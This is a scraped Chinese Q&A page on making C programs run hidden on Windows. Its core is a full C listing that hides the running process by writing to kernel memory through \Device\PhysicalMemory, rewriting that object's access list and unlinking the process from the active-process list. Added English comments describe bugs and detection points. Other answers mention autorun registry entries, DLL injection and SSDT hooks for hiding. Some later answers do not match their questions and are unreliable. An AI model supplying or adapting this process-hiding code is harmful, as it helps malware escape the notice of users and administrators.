C语言 关于隐藏进程

作者&投稿:端骅 (若有异议请与网页底部的电邮联系)
c语言如何让程序隐藏在后台~

一般所说的界面隐藏,就是控制台程序的窗口隐藏;另外还有进程隐藏、端口隐藏、启动隐藏、数据隐藏等等,太多太多了。

对于初学者来说,编写的都是控制台模式的C程序,也就是运行时会出现一个黑底的command窗口。
如果要运行时隐藏,就需要使用windows 程序,同时不要创建任何窗体,这样就不会有任何界面了。
使用VC创建隐藏运行程序方法如下:
1、 在创建工程的时候,不可以选择Win32 Console Application,而是要选择Win32 Application。

2、后续操作和Console程序类似,唯一区别为,Win32 App的主函数(入口函数)不是main,而是
int WINAPI WinMain(HINSTANCE,HINSTANCE,int,LPCSTR)
3、这种方式创建的程序,虽然不会有界面出现,但在任务管理器中还是有进程的。

这个程序用C很难实现,你必须好好学学WinSDK,调用Win32接口函数,去实现
这有一个网上搜到的例子:
// cctest.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#define WIN32_LEAN_AND_MEAN
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include <accctrl.h>
#include <aclapi.h>

// NTSTATUS convention: values with the sign bit clear (>= 0) are success or
// informational, negative values are warnings/errors.
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
// Declared but not referenced by the code below.
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
// Returned by ZwOpenSection when the caller lacks the requested access;
// OpenPhysicalMemory() branches on exactly this value.
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

// The native-API types are not in the public SDK headers included above, so
// the minimum this file needs is declared by hand.
typedef LONG NTSTATUS;

// Counted (length-prefixed) string used by the native API; filled in by
// RtlInitUnicodeString, never built by hand here.
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// Describes the object a Zw*/Nt* open call targets. OpenPhysicalMemory() sets
// only Length and ObjectName; the remaining members are left zero/NULL.
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// Prototypes of the two ntdll.dll exports resolved at run time by InitNtDll().
// They have no import-library entry in this SDK, hence the GetProcAddress
// indirection; both pointers stay NULL until InitNtDll() succeeds.
typedef NTSTATUS(CALLBACK* ZWOPENSECTION)(OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes);
typedef VOID(CALLBACK* RTLINITUNICODESTRING)(IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString);
static RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
static ZWOPENSECTION ZwOpenSection = NULL;

// Process-wide state shared by every helper below. No synchronization is
// visible anywhere in this file, so the helpers are only safe to call from
// one thread at a time.
// g_hNtDLL:             module handle returned by LoadLibrary in InitNtDll()
// g_pMapPhysicalMemory: 4 KiB view of the page directory (see OpenPhysicalMemory)
// g_hPhysicalMemory:    section handle for \Device\PhysicalMemory
// g_ovVerInfo:          filled by GetVersionEx in HideCurrentProcess()
static HMODULE g_hNtDLL = NULL;
static PVOID g_pMapPhysicalMemory = NULL;
static HANDLE g_hPhysicalMemory = NULL;
static OSVERSIONINFO g_ovVerInfo;
// PAE support was never finished; the related code further down is commented out.
// BOOL g_bPaeEnabled = FALSE;

//////////////////////////////////////////////////////////////////////////
// Load ntdll.dll and retrieve function addresses
//////////////////////////////////////////////////////////////////////////
// Load ntdll.dll and retrieve function addresses
//
// Resolves RtlInitUnicodeString and ZwOpenSection into the file-scope
// function pointers.
// Returns: TRUE on success; FALSE if the module or either export is missing.
//   On the FALSE path after a successful LoadLibrary, g_hNtDLL stays set and
//   the module reference is only released if the caller invokes CloseNtDll()
//   (HideCurrentProcess() does not).
//
// Defender's note: a user-mode binary resolving Zw*/Nt* exports by name at
// run time is a common behavioural indicator that endpoint telemetry can flag.
BOOL InitNtDll()
{
// ntdll.dll is already mapped into every user-mode process, so this call
// mostly increments the reference count of the existing module.
g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
if (NULL == g_hNtDLL)
return FALSE;

RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");
// Either pointer may be NULL on an OS that lacks the export; both are
// required by OpenPhysicalMemory().
if (!RtlInitUnicodeString || !ZwOpenSection)
return FALSE;

return TRUE;
}

//////////////////////////////////////////////////////////////////////////
// Free ntdll.dll
//////////////////////////////////////////////////////////////////////////
// Free ntdll.dll
//
// Releases the module reference taken by InitNtDll() and clears the handle.
// Safe to call when InitNtDll() was never called or failed (g_hNtDLL NULL).
// The resolved function pointers are deliberately left untouched, so they
// would dangle if the module were actually unloaded.
void CloseNtDll()
{
if (g_hNtDLL)
FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;
}

//////////////////////////////////////////////////////////////////////////
// Modifies ACL to allow write access to section
//////////////////////////////////////////////////////////////////////////
// Modifies ACL to allow write access to section
//
// Adds a SECTION_MAP_WRITE allow-ACE for the calling user to the DACL of
// hSection, which must have been opened with READ_CONTROL | WRITE_DAC.
// hSection: handle to the section object (here \Device\PhysicalMemory).
// Returns nothing and reports no status, so the caller cannot tell whether
// the DACL change succeeded; OpenPhysicalMemory() simply retries the open.
//
// NOTE(review): on the success path (SetSecurityInfo returns ERROR_SUCCESS)
// neither pSD nor pNewDacl is LocalFree'd, so both allocations leak.
//
// Defender's note: rewriting the DACL of \Device\PhysicalMemory from user
// mode is a well-known rootkit precursor. Windows Server 2003 SP1 and later
// no longer allow user-mode access to this section, so on current systems
// this path fails at the open and audit logging of object-DACL changes
// (SetSecurityInfo on SE_KERNEL_OBJECT) is the place to look for attempts.
void SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
// Retrieve the security descriptor
// pDacl points inside the buffer returned in pSD; only pSD is freed.
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD);
if (dwRes != ERROR_SUCCESS)
return;

// Setup the access struct, write access for current user
EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
// "CURRENT_USER" is the special trustee name SetEntriesInAcl resolves to the
// caller's own account.
ea.Trustee.ptstrName = _T("CURRENT_USER");

// Create the new ACL
// Merges the new ACE with the existing DACL into a freshly allocated one.
PACL pNewDacl = NULL;
dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
if (ERROR_SUCCESS != dwRes)
{
if (pSD)
LocalFree(pSD);
if (pNewDacl)
LocalFree(pNewDacl);
return;
}

// Set the security descriptor
dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL);
if (ERROR_SUCCESS != dwRes)
{
if (pSD)
LocalFree(pSD);
if (pNewDacl)
LocalFree(pNewDacl);
return;
}
// Falls through without freeing pSD / pNewDacl (see NOTE above).
}

//////////////////////////////////////////////////////////////////////////
// Opens a handle and maps a view of the physical memory device
//////////////////////////////////////////////////////////////////////////
// Opens a handle and maps a view of the physical memory device
//
// Opens \Device\PhysicalMemory for read/write into g_hPhysicalMemory and maps
// the 4 KiB page at the OS-specific page-directory physical address into
// g_pMapPhysicalMemory; LinearToPhys() later indexes that view as the page
// directory. g_ovVerInfo must already be filled in by the caller.
// Returns:  1 on success (the caller tests for exactly 1)
//          -1 unsupported OS version (no page-directory address known)
//          -2 the section could not be opened even after the DACL retry
//          -3 MapViewOfFile failed; g_hPhysicalMemory is left OPEN on this
//             path, and HideCurrentProcess() then calls only CloseNtDll(),
//             so the handle leaks.
//
// Defender's note: the hard-coded physical addresses below are specific to
// particular 32-bit, non-PAE builds; on anything newer the open fails
// because user-mode access to \Device\PhysicalMemory was removed in Windows
// Server 2003 SP1. Attempts to open this object name are a high-signal
// detection opportunity regardless of outcome.
int OpenPhysicalMemory()
{
// Set the system PDB based on OS
// "PDB" = page directory base: the physical address the kernel's page
// directory lives at on that build. These are constants observed on specific
// installs, not values derived at run time.
ULONG PhyDirectory = 0;
if (g_ovVerInfo.dwMajorVersion == 5)
{
if (g_ovVerInfo.dwMinorVersion == 0) // 2K
{
PhyDirectory = 0x30000;
}
else if (g_ovVerInfo.dwMinorVersion == 1) // XP
{
// if (g_bPaeEnabled)
// PhyDirectory = 0x33f00;
// else
PhyDirectory = 0x39000;
}
else if (g_ovVerInfo.dwMinorVersion == 2) // 2K3
{
// if (g_bPaeEnabled)
// PhyDirectory = 0xad6000;
// else
PhyDirectory = 0x39000;
}
}
else if (g_ovVerInfo.dwMajorVersion == 4 && // NT
g_ovVerInfo.dwMinorVersion == 0 &&
g_ovVerInfo.dwPlatformId == 2)
{
PhyDirectory = 0x30000;
}
if (PhyDirectory == 0)
return -1;

UNICODE_STRING uszDevice;
RtlInitUnicodeString(&uszDevice, L"\\Device\\PhysicalMemory");

// Setup the object attributes
OBJECT_ATTRIBUTES oaAttr;
oaAttr.Length = sizeof(OBJECT_ATTRIBUTES);
oaAttr.RootDirectory = NULL;
oaAttr.ObjectName = &uszDevice;
oaAttr.Attributes = 0;
oaAttr.SecurityDescriptor = NULL;
oaAttr.SecurityQualityOfService = NULL;

// Open the physical memory device with write access
NTSTATUS lStatus;
lStatus = ZwOpenSection(&g_hPhysicalMemory, SECTION_MAP_READ | SECTION_MAP_WRITE, &oaAttr);

// If the attempt failed, try to modify the acl so we can open it
if (lStatus == STATUS_ACCESS_DENIED)
{
// NOTE(review): the status of this READ_CONTROL | WRITE_DAC open is never
// checked, so an invalid g_hPhysicalMemory may be handed to the DACL helper
// and to CloseHandle below.
lStatus = ZwOpenSection(&g_hPhysicalMemory, READ_CONTROL | WRITE_DAC, &oaAttr);
SetPhyscialMemorySectionCanBeWrited(g_hPhysicalMemory);
CloseHandle(g_hPhysicalMemory);
// Retry with the original access mask; only this status decides success.
lStatus = ZwOpenSection(&g_hPhysicalMemory, SECTION_MAP_READ | SECTION_MAP_WRITE, &oaAttr);
}
if (!NT_SUCCESS(lStatus))
return -2;

// Map a view of the memory
// Offset PhyDirectory within the section is the physical address; one page.
g_pMapPhysicalMemory = MapViewOfFile(g_hPhysicalMemory, FILE_MAP_READ | FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
if (!g_pMapPhysicalMemory)
return -3;

return 1;
}

//////////////////////////////////////////////////////////////////////////
// Close the handle and map to the physical memory device
//////////////////////////////////////////////////////////////////////////
// Close the handle and map to the physical memory device
//
// Undoes OpenPhysicalMemory(): unmaps the page-directory view and closes the
// section handle, then clears both globals. Safe to call when either global
// is already NULL. Return values of the two Win32 calls are not checked.
void ClosePhysicalMemory()
{
if (g_pMapPhysicalMemory)
UnmapViewOfFile(g_pMapPhysicalMemory);
if (g_hPhysicalMemory)
CloseHandle(g_hPhysicalMemory);
g_pMapPhysicalMemory = NULL;
g_hPhysicalMemory = NULL;
}

//////////////////////////////////////////////////////////////////////////
// Maps a virtual address to a physical address
//////////////////////////////////////////////////////////////////////////
// Maps a virtual address to a physical address
//
// Walks the 32-bit, two-level (non-PAE) page tables by hand:
//   bits 31..22 of the VA index the page directory (pBaseAddress),
//   PDE bit 0 = present, PDE bit 7 (0x80) = 4 MiB large page,
//   otherwise bits 21..12 index the page table, PTE bit 0 = present.
// pBaseAddress: mapped view of the page directory (g_pMapPhysicalMemory).
// pVirtualAddr: kernel virtual address to translate.
// Returns: the physical address as a PVOID, or 0 when pBaseAddress is NULL or
//   the directory/table entry is not present. 0 is therefore an in-band
//   sentinel; physical page 0 can never be returned.
//
// NOTE(review): the MapViewOfFile result below is dereferenced without a NULL
// check, and the "page table entry not present" branch returns without
// unmapping that view (leak). Pointers are round-tripped through ULONG, which
// only holds on a 32-bit process. PAE (3-level tables) is not handled; the
// commented-out g_bPaeEnabled code above suggests it never was.
PVOID LinearToPhys(PULONG pBaseAddress, PVOID pVirtualAddr)
{
if (!pBaseAddress)
return 0;

ULONG ulVirtualAddr = (ULONG)pVirtualAddr, ulPhysicalAddr;
// Doesn't work on my 2K virtual machine if this code is enabled
// if (ulVirtualAddr >= 0x80000000 && ulVirtualAddr < 0xa0000000)
// {
// ulPhysicalAddr = ulVirtualAddr - 0x80000000;
// return (PVOID)ulPhysicalAddr;
// }

ULONG ulPageDir, ulPageTable;
// Page-directory entry for this VA (top 10 bits).
ulPageDir = pBaseAddress[ulVirtualAddr >> 22];
if ((ulPageDir & 1) != 0)
{
// Bit 7 set: 4 MiB page, the PDE itself holds the frame base.
ULONG tmp = ulPageDir & 0x00000080;
if (tmp != 0)
{
ulPhysicalAddr = ((ulPageDir & 0xFFC00000) + (ulVirtualAddr & 0x003FFFFF));
}
else
{
// Map the page table this PDE points to and pick the PTE (middle 10 bits).
ulPageDir = (ULONG)MapViewOfFile(g_hPhysicalMemory, FILE_MAP_ALL_ACCESS, 0, ulPageDir & 0xFFFFF000, 0x1000);
ulPageTable = ((PULONG)ulPageDir)[(ulVirtualAddr & 0x003FF000) >> 12];
if ((ulPageTable & 1) != 0)
{
ulPhysicalAddr = (ulPageTable & 0xFFFFF000) + (ulVirtualAddr & 0x00000FFF);
UnmapViewOfFile((PVOID)ulPageDir);
}
else
{
// Page-table view from above is not unmapped on this path.
return 0;
}
}
}
else
{
return 0;
}

return (PVOID)ulPhysicalAddr;
}

//////////////////////////////////////////////////////////////////////////
// Reads data from memory
//////////////////////////////////////////////////////////////////////////
// Reads data from memory
//
// Reads one ULONG at a kernel virtual address by translating it with
// LinearToPhys() and mapping the containing physical page read-only.
// pVirtualAddr: kernel virtual address (assumed 4-byte aligned; the low two
//   bits are dropped by the >> 2 index).
// Returns: the value read, or 0 if translation or mapping failed. A genuine
//   stored value of 0 is indistinguishable from failure; every caller in
//   HideCurrentProcess() treats 0 as an error.
ULONG GetData(PVOID pVirtualAddr)
{
ULONG ulPhysicalAddr = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, pVirtualAddr);
if (!ulPhysicalAddr)
return 0;

// Map the 4 KiB page containing the address; offset must be page aligned.
PULONG pTemp = (PULONG)MapViewOfFile(g_hPhysicalMemory, FILE_MAP_READ, 0, ulPhysicalAddr & 0xFFFFF000, 0x1000);
if (!pTemp)
return 0;

// Index of the ULONG within the page.
ULONG ulReturn = pTemp[(ulPhysicalAddr & 0xFFF) >> 2];
UnmapViewOfFile(pTemp);
return ulReturn;
}

//////////////////////////////////////////////////////////////////////////
// Writes data to memory
//////////////////////////////////////////////////////////////////////////
// Writes data to memory
//
// Writes one ULONG at a kernel virtual address: mirror image of GetData()
// with a FILE_MAP_WRITE view. This is the primitive that makes the whole file
// a direct-kernel-object-manipulation tool; nothing validates that the
// target address belongs to the structure the caller expects.
// pVirtualAddr: kernel virtual address (low two bits ignored by the index).
// ulData: value to store.
// Returns: TRUE if the store was issued, FALSE if translation or mapping
//   failed. UnmapViewOfFile's result is not checked.
BOOL SetData(PVOID pVirtualAddr, ULONG ulData)
{
ULONG ulPhysicalAddr = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, pVirtualAddr);
if (!ulPhysicalAddr)
return FALSE;

PULONG pTemp = (PULONG)MapViewOfFile(g_hPhysicalMemory, FILE_MAP_WRITE, 0, ulPhysicalAddr & 0xFFFFF000, 0x1000);
if (!pTemp)
return FALSE;

pTemp[(ulPhysicalAddr & 0xFFF) >> 2] = ulData;
UnmapViewOfFile(pTemp);
return TRUE;
}

//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
// Enables or removes a named privilege on the current process token.
//
// pPrivName: privilege name constant, e.g. SE_SECURITY_NAME.
// bEnable:   TRUE sets SE_PRIVILEGE_ENABLED; FALSE sets SE_PRIVILEGE_REMOVED,
//            which deletes the privilege from the token for good rather than
//            merely disabling it (a later EnablePrivilege(..., TRUE) on the
//            same token will fail).
// Returns: FALSE if the token cannot be opened or the name cannot be looked
//   up; otherwise the raw result of AdjustTokenPrivileges.
//
// NOTE(review): AdjustTokenPrivileges returns TRUE even when the privilege
// was not held and therefore not enabled; callers must also check
// GetLastError() == ERROR_NOT_ALL_ASSIGNED. HideCurrentProcess() ignores the
// return value entirely.
BOOL EnablePrivilege(TCHAR *pPrivName, BOOL bEnable/* = TRUE*/)
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return FALSE;

LUID uidName;
if (!LookupPrivilegeValue(NULL, pPrivName, &uidName))
{
CloseHandle(hToken);
return FALSE;
}

// Single-entry privilege array; TOKEN_PRIVILEGES declares room for one LUID.
TOKEN_PRIVILEGES tpToken;
tpToken.PrivilegeCount = 1;
tpToken.Privileges[0].Luid = uidName;
tpToken.Privileges[0].Attributes = bEnable?SE_PRIVILEGE_ENABLED:SE_PRIVILEGE_REMOVED;

// Previous state is not requested (NULL), so the change cannot be undone
// precisely; dwReturn receives the required buffer length and is unused.
DWORD dwReturn;
BOOL bReturn = AdjustTokenPrivileges(hToken, FALSE, &tpToken, sizeof(TOKEN_PRIVILEGES), NULL, &dwReturn);
CloseHandle(hToken);
return bReturn;
}

//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
// Unlinks the current process from the kernel's active-process list
// (direct kernel object manipulation via \Device\PhysicalMemory).
//
// Sequence: read the OS version to pick the ActiveProcessLinks offsets,
// open/map physical memory, follow a fixed 32-bit kernel address to the
// current thread, from there to its process object, then rewrite the two
// neighbouring list entries so they skip this process. Enumerations that
// walk that list (Task Manager and similar) no longer see the process; the
// process keeps running because scheduling does not depend on that list.
// Returns: TRUE if both list writes were issued, FALSE on any earlier failure.
// Uses the file-scope globals; not reentrant.
//
// Defender's notes:
//  - The unlinked process still owns a handle table, threads, a PID entry and
//    memory-pool allocations. Cross-view comparison (list walk vs. handle/PID
//    table vs. pool/thread scans), as done by memory-forensics and anti-rootkit
//    tools, is exactly what exposes this class of manipulation.
//  - The technique is tied to 32-bit, non-PAE builds from the NT4..2003 era:
//    user-mode access to \Device\PhysicalMemory was removed in Server 2003
//    SP1, the structure offsets below are hard-coded per build, and on x64
//    kernel patch protection guards this kind of structure edit. Expect this
//    code to fail early (OpenPhysicalMemory) on anything current.
//  - Observable precursors: the privilege adjustment, opening the
//    \Device\PhysicalMemory object, and the DACL rewrite in
//    SetPhyscialMemorySectionCanBeWrited().
//
// NOTE(review): EnablePrivilege's result is ignored; the privilege is removed
// only on the success path, never on the error returns; and the
// OpenPhysicalMemory() failure branch calls CloseNtDll() but not
// ClosePhysicalMemory(), so a partially opened handle can leak.
BOOL HideCurrentProcess()
{
// Retrieve the OS version
g_ovVerInfo.dwOSVersionInfoSize = sizeof(g_ovVerInfo);
if (!GetVersionEx(&g_ovVerInfo))
{
return FALSE;
}

// Set the flink and blink offsets based on the OS
// Offsets of the ActiveProcessLinks Flink/Blink within the process object
// for each supported build. NOTE(review): the 2K3 pair (0x8A/0x8E) is not
// 4-byte aligned, unlike every other entry; it looks like a transcription
// error worth confirming before trusting the table.
ULONG nFlinkOffset = 0;
ULONG nBlinkOffset = 0;
if (g_ovVerInfo.dwMajorVersion == 5)
{
if (g_ovVerInfo.dwMinorVersion == 0) // 2K
{
nFlinkOffset = 0xA0;
nBlinkOffset = 0xA4;
}
else if (g_ovVerInfo.dwMinorVersion == 1) // XP
{
nFlinkOffset = 0x88;
nBlinkOffset = 0x8C;
}
else if (g_ovVerInfo.dwMinorVersion == 2) // 2K3
{
nFlinkOffset = 0x8A;
nBlinkOffset = 0x8E;
}
}
else if (g_ovVerInfo.dwMajorVersion == 4 && // NT
g_ovVerInfo.dwMinorVersion == 0 &&
g_ovVerInfo.dwPlatformId == 2)
{
nFlinkOffset = 0x98;
nBlinkOffset = 0x9C;
}
if (nFlinkOffset == 0 || nBlinkOffset == 0)
{
return FALSE;
}

// Enable SeSecurityPrivilege
// Return value unchecked; failure here only surfaces later as an open error.
EnablePrivilege(SE_SECURITY_NAME, TRUE);

// Initialize ntdll.dll and open the physical memory
if (!InitNtDll())
{
return FALSE;
}
int nRet = OpenPhysicalMemory();
if (nRet != 1)
{
// ClosePhysicalMemory() is not called here; see NOTE in the header.
CloseNtDll();
return FALSE;
}

// Read the ETHREAD struct
// 0xFFDFF124 is a fixed kernel address on 32-bit x86 — presumably the
// current-thread pointer inside the processor control region (KPCR at
// 0xFFDFF000); confirm against the target build's symbols.
ULONG ulThread = GetData((PVOID)0xFFDFF124);
if (!ulThread)
{
ClosePhysicalMemory();
CloseNtDll();
return FALSE;
}

// Read the EPROCESS struct
// +0x44 is taken to be the owning-process pointer inside the thread object
// on these builds; hard-coded, not derived.
ULONG ulProcess = GetData((PVOID)(ulThread + 0x44));
if (!ulProcess)
{
ClosePhysicalMemory();
CloseNtDll();
return FALSE;
}

// Retrieve the flink and blink from the EPROCESS struct
ULONG ulFlink = GetData(PVOID(ulProcess + nFlinkOffset));
ULONG ulBlink = GetData(PVOID(ulProcess + nBlinkOffset));
if (!ulFlink || !ulBlink)
{
ClosePhysicalMemory();
CloseNtDll();
return FALSE;
}

// Hide from list
// ulFlink/ulBlink point at the neighbours' LIST_ENTRY (Flink at +0, Blink at
// +4): next->Blink = our Blink, prev->Flink = our Flink. This process's own
// entry is left pointing at its former neighbours, a dangling pattern that
// memory-forensics tools look for.
if (!SetData((PVOID)(ulFlink + 4), ulBlink) ||
!SetData((PVOID)(ulBlink), ulFlink))
{
ClosePhysicalMemory();
CloseNtDll();
return FALSE;
}

// Clean up
ClosePhysicalMemory();
CloseNtDll();

// Remove SeSecurityPrivilege
// SE_PRIVILEGE_REMOVED: the privilege is deleted from the token, not disabled.
EnablePrivilege(SE_SECURITY_NAME, FALSE);

return TRUE;
}

// Entry point: attempts to unlink the process, then blocks on stdin so the
// process stays alive for the author to inspect it in Task Manager.
// argc/argv are unused. The result of HideCurrentProcess() is ignored, so
// the program cannot tell the user whether anything happened.
//
// NOTE(review): scanf's return value is unchecked, and printf("\n", a) passes
// an argument the format string never consumes (ignored per the C standard,
// but almost certainly meant to be "%d\n").
int main(int argc, char **argv)
{
//

int a = 0;
HideCurrentProcess();

// Blocks until a line of input arrives; this is what keeps the process resident.
scanf("%d",&a);
printf("\n",a);
return 0; // Program successfully completed.

}

让程序在任务管理器的进程列表里不显示,这个不大可能
开机自动运行这个可以,加载到注册表的AutoRun表项就可以了

自动运行我不是有嘛


惠水县13426158734: c语言如何让程序隐藏在后台 -
牧嵇胃乐: 一般所说的界面隐藏,就是控制台程序的窗口隐藏;另外还有进程隐藏、端口隐藏、启动隐藏、数据隐藏等等,太多太多了。

惠水县13426158734: 怎样用C语言隐藏一个应用程序的窗口?? -
牧嵇胃乐: #include <stdio.h>#include <stdlib.h>#include <windows.h>#include <Winuser.h>#include <shellapi.h>#pragma comment(lib,"shell32.lib") main(){ ShellExecuteA(NULL,TEXT("open"), TEXT("wmplayer.exe"), TEXT("K:\\Loonie\\C\\P1\\1....

惠水县13426158734: C语言编写的程序,怎样隐藏运行,不弹CMD窗口 -
牧嵇胃乐: 1、调用system函数时用start的/b参数,system("start /b ping 10.10.10.11 -t"); 即可隐藏窗口. 2、system函数: 原型:int system(const char * command); 功能:执行 dos(windows系统) 或 shell(Linux/Unix系统) 命令,参数字符串command...

惠水县13426158734: C语言运行一个有界面的exe怎么隐藏运行 -
牧嵇胃乐: 1、头文件调用windows.h 2、使用并写出窗口代码, 3、或者新建一个MFC来创建窗口这里,代码默认都是输出在CMD,想要窗口必须自己通过代码创建或者使用MFC

惠水县13426158734: 如何让编写的C语言程序隐藏运行 -
牧嵇胃乐: 对于初学者来说,编写的都是控制台模式的C程序,也就是运行时会出现一个黑底的command窗口. 如果要运行时隐藏,就需要使用windows 程序,同时不要创建任何窗体,这样就不会有任何界面了. 使用VC创建隐藏运行程序方法如下:1、 ...

惠水县13426158734: 如何隐藏系统进程 -
牧嵇胃乐: 隐藏系统进程步骤:1、进入计算机,打开任意一个文件夹,然后再点击顶部菜单上的“查看”,或者按"ALT键"弹出工具栏.2、点击查看.3、勾选隐藏的项目,如果需要取消显示隐藏,取消勾选“隐藏的项目”即可.

惠水县13426158734: 怎样用代码实现一个程序运行时不会显示在任务管理器中的应用程序一栏?(用C语言)求大神啊...
牧嵇胃乐: 有很多方法, 比较公开也比较成熟的两种方法是: 方法1. 把功能模块做成dll, 然后用CreateRemoteThread函数注入到其他进程执行 方法2. HOOK SSDT 隐藏你的进程 具体代码一搜一大把, 这是05年左右木马里比较流行的技术

惠水县13426158734: C++隐藏进程代码
牧嵇胃乐: 最简单的方法:写在dll文件里面 然后cmd里面运行或者写到.bat文件: rundll32 foolu.dll fool (可以把这个命令框关掉)

惠水县13426158734: c语言如何让电脑一直按下shift键,并且让程序隐藏运行? -
牧嵇胃乐: 开始---控制面板---电源选项---休眠---在启用休眠前打勾.

惠水县13426158734: 在c语言中,我如果想隐藏一个运行窗口该怎样隐藏?
牧嵇胃乐: 这个就涉及到Windows编程了,和大学里学的那些编程貌似很不一样. Windows编程简单的来说以一个WinMain()开始,利用了Windows的消息机制和系统API,呵呵,好像简单几句话说不清楚,你最好利用向导生成一个Win32 Application,看看它的结构,实际编程的时候使用MFC AppWizard.
